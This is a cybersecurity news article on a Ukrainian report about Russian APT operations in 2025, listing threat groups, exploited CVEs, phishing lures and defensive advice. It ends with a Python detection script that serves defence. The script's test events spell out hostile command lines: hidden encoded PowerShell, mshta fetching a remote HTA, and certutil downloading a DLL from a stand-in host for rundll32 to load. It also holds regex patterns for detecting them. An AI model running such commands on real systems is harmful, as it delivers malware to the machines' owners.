Ukrainian Intelligence Report: Russian APT Groups Intensify Cyber Operations — 5,927 Incidents, 37% Rise in 2025

dark6 23 May 2026
A comprehensive new intelligence report from Ukraine’s National Security and Defense Council (NSDC), shared with Cyber Security News, has documented the staggering scale of Russian state-sponsored cyber operations in 2025. CERT-UA recorded 5,927 cyber incidents — a 37.4% increase compared to 2024 — as Russian threat actors deployed an increasingly versatile toolkit targeting government bodies, defense organizations, energy infrastructure, and critical sectors across Ukraine and Europe.

The Main Threat Actor Clusters

The report identifies four primary Russian-linked threat actor clusters driving the bulk of the observed activity in 2025:

  • UAC-0002 (Sandworm) — GRU-linked group known for large-scale destructive operations, wiper malware deployment, and critical infrastructure attacks
  • UAC-0001 (APT28 / Fancy Bear) — GRU-affiliated espionage cluster focused on credential theft, data exfiltration, and long-term access maintenance
  • UAC-0010 (Gamaredon / Armageddon) — FSB-affiliated group conducting persistent, high-volume spear-phishing campaigns against Ukrainian government and military targets
  • UAC-0190 (Void Blizzard) — A newer cluster with a focused mandate against Ukrainian government and defense sector organizations

These groups do not operate as independent cybercriminals. They are instruments of a broader geopolitical strategy, running well-planned, persistent campaigns designed to support Russian military and intelligence objectives in the ongoing conflict.

RDP and VPN Exploitation

Remote Desktop Protocol (RDP) remained one of the most heavily abused initial access vectors throughout 2025. Groups including UAC-0238 exploited exposed RDP services to deliver ransomware variants — including X2anylock, Warlock, and LockBit 3.0 — directly into compromised environments. The persistence of internet-exposed RDP services across both government agencies and private organizations continues to provide attackers with reliable, low-effort entry points that require no user interaction to exploit.

VPN appliances were systematically targeted via multiple CVEs. Cisco ASA/AnyConnect vulnerabilities CVE-2025-20333 and CVE-2025-20362 were exploited, as were Fortinet appliance flaws CVE-2024-55591, CVE-2024-21762, and CVE-2025-24472. Successful VPN exploitation provides attackers with a direct, trusted tunnel into internal networks, bypassing perimeter defenses entirely and granting access indistinguishable from legitimate remote workers.

Supply Chain Compromises

Supply chain attacks added a particularly dangerous dimension to the 2025 threat landscape. Russian-linked actors targeted software update mechanisms, third-party IT service providers, and development tooling ecosystems to plant backdoors in trusted distribution channels — where organizational scrutiny and monitoring are typically far lower than for direct attack vectors.

Once embedded through supply chain access, groups deployed persistent malware families including Remcos RAT, DarkCrystal RAT, XWorm, and Lumma Stealer. Legacy Microsoft Office vulnerabilities — including the decade-old CVE-2017-11882 and CVE-2017-0199 — were also actively weaponized against organizations that have yet to patch them, demonstrating that historical vulnerabilities carry very real contemporary consequences when patch management is neglected. Additional exploited platforms included Roundcube (CVE-2024-42009, CVE-2025-49113), WinRAR (CVE-2025-6218), and 7-Zip (CVE-2025-0411).

Social Engineering Across Multiple Platforms

Social engineering remained among the most reliable methods for gaining initial access in 2025, with Russian actors deliberately expanding their phishing operations beyond traditional enterprise email into consumer messaging platforms.

Phishing lures were distributed through Microsoft O365, Roundcube, and Zimbra email systems as well as Signal, WhatsApp, and Telegram — a calculated strategy to reach targets on less-monitored channels. Novel techniques observed include ClickFix social engineering lures, fake CAPTCHA prompts designed to trick users into executing PowerShell commands, OAuth device-code phishing against Microsoft Teams, and App-Specific Password phishing targeting Google accounts. QR-code session hijacking via a method known as GhostPairing was also deployed, with fake Android APK files distributed outside of Google Play to infect mobile devices with CamelSpy spyware.

In at least one documented case, attackers purchased stolen credentials from darknet access brokers and used them to move directly into target environments — completely bypassing the phishing stage and compressing the time from initial access to active exploitation.

Post-Compromise Payloads and Objectives

After gaining initial access, Russian groups deployed a broad arsenal of post-compromise tools aligned with their operational objectives. Sandworm (UAC-0002) deployed destructive wiper malware including ZEROLOT and PathWiper in attacks aimed at causing maximum disruption to Ukrainian infrastructure. Long-running espionage tools such as HomeSteel and WreckSteel silently collected and exfiltrated sensitive data over extended periods. Living-off-the-Land techniques using built-in Windows tools — PowerShell, certutil, mshta.exe, and rundll32 — helped attackers blend into normal system activity and evade behavioral detection. Payloads were delivered via SVG, PNG, LNK, JavaScript, and HTA files, frequently hosted on legitimate services including Dropbox, Google Drive, and Cloudflare Tunnels to bypass network filtering.

Defensive Recommendations

The NSDC report outlines a set of prioritized defensive measures organizations should implement in response to the elevated Russian threat landscape:

  • Enforce multi-factor authentication across all remote access solutions, email platforms, and administrative interfaces — including messaging apps used for work communications
  • Adopt Zero Trust architecture principles: assume breach, verify every access request regardless of network location
  • Deploy Protective DNS to block malicious command-and-control domains before connections are established
  • Restrict RDP access to trusted IP ranges only and require VPN authentication before any RDP interface is accessible
  • Maintain aggressive patch management for both recent and legacy vulnerabilities — decade-old Office flaws are still being actively exploited in 2025
  • Monitor for anomalous use of built-in system tools (PowerShell, certutil, mshta.exe) that attackers repurpose in Living-off-the-Land campaigns
  • Conduct regular staff security awareness training that explicitly covers social engineering via messaging apps and QR-code-based attack techniques
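The Living-off-the-Land tradecraft described in the post-compromise section (PowerShell, certutil, mshta.exe, rundll32 delivered via LNK/HTA/JavaScript lures) and the monitoring recommendation in the list above are the kind of activity a process-creation detection rule can cover. The following is an added example, not code from the NSDC report or CERT-UA: a small Python scanner over constructed process-creation events (fields modelled on Sysmon Event ID 1: parent image, image, command line) that flags PowerShell launched with hidden-window or encoded-command flags, certutil used as a downloader, mshta loading a remote HTA, rundll32 loading a DLL from a user-writable path, and LOLBins spawned by an Office parent. The ClickFix-style rule (suspicious PowerShell spawned by explorer.exe, as happens when a user pastes a command into the Run dialog) is an assumption about how that lure usually manifests, not a detail the report states. The sample events, rule names and the base64 placeholder are constructed.

```python
"""Flag anomalous use of built-in Windows tools in process-creation telemetry.

Added example for this article; not code from the NSDC report. Event shape
(parent, image, cmdline) is an assumption modelled on Sysmon Event ID 1 /
Security 4688 fields. All sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    event_index: int
    rule: str
    image: str


# Constructed sample events. Indices 0-3 model suspicious activity, 4-6 model
# benign administrative use of the same binaries (to show the rules' precision).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc SQBFAFgAIABQAEwAQQBDAEUASABPAEwARABFAFIA"},  # placeholder base64
    {"parent": "winword.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.png C:\\Users\\Public\\a.dll"},
    {"parent": "cmd.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\Public\\a.dll,DllMain"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe Get-ChildItem C:\\temp"},
    {"parent": "cmd.exe", "image": "certutil.exe", "cmdline": "certutil.exe -hashfile C:\\tools\\x.exe SHA256"},
]

OFFICE_PARENTS = re.compile(r"(?i)^(winword|excel|powerpnt|outlook)\.exe$")
LOLBINS = re.compile(r"(?i)^(powershell|pwsh|mshta|certutil|rundll32|wscript|cscript)\.exe$")
URL = re.compile(r"(?i)\bhttps?://")
USER_WRITABLE = re.compile(r"(?i)(\\users\\public\\|\\appdata\\|\\temp\\|\\programdata\\)")

# Individual PowerShell evasion indicators; two or more together trigger the rule,
# so a lone "-nop" in an admin script does not fire on its own.
PS_INDICATORS = [
    re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s"),      # encoded command
    re.compile(r"(?i)(^|\s)-w(indowstyle)?\s+hidden\b"),        # hidden window
    re.compile(r"(?i)(^|\s)-nop(rofile)?\b"),                   # no profile
    re.compile(r"(?i)(^|\s)-(ep|executionpolicy)\s+bypass\b"),  # policy bypass
]


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule the event matches, in a fixed order."""
    rules: list[str] = []
    image = event["image"].lower()
    parent = event["parent"]
    cmd = event["cmdline"]

    if image in ("powershell.exe", "pwsh.exe"):
        if sum(1 for p in PS_INDICATORS if p.search(cmd)) >= 2:
            rules.append("powershell_hidden_or_encoded")
    if image == "certutil.exe" and re.search(r"(?i)-urlcache", cmd) and URL.search(cmd):
        rules.append("certutil_download")
    if image == "mshta.exe" and URL.search(cmd):
        rules.append("mshta_remote_hta")
    if image == "rundll32.exe" and USER_WRITABLE.search(cmd):
        rules.append("rundll32_user_writable_dll")
    if OFFICE_PARENTS.match(parent) and LOLBINS.match(image):
        rules.append("lolbin_spawned_by_office")
    # Assumed ClickFix pattern: the user pastes the lure into Run/Explorer, so
    # explorer.exe is the parent of an evasive PowerShell process.
    if parent.lower() == "explorer.exe" and "powershell_hidden_or_encoded" in rules:
        rules.append("clickfix_pattern_user_pasted_powershell")
    return rules


def scan(events: list[dict]) -> list[Finding]:
    """Run every rule over every event and collect the findings."""
    return [Finding(i, rule, e["image"]) for i, e in enumerate(events) for rule in evaluate(e)]


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule, useful for a daily LOTL-activity report."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_index}: {f.image} -> {f.rule}")
    print(summarize(scan(SAMPLE_EVENTS)))
```

The benign events (svchost, an interactive `Get-ChildItem`, and `certutil -hashfile`) produce no findings, which is the point of requiring a URL for certutil and two or more evasion flags for PowerShell: the same binaries are used legitimately all day, so the rules key on the arguments attackers need rather than on the binary name alone.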

The 37.4% year-over-year increase in recorded incidents makes clear that Russian cyber operations are not plateauing — they are escalating in both volume and sophistication. Organizations operating in sectors that represent strategic targets for Russian intelligence must treat this as an active, ongoing threat and ensure their defensive posture reflects that reality.
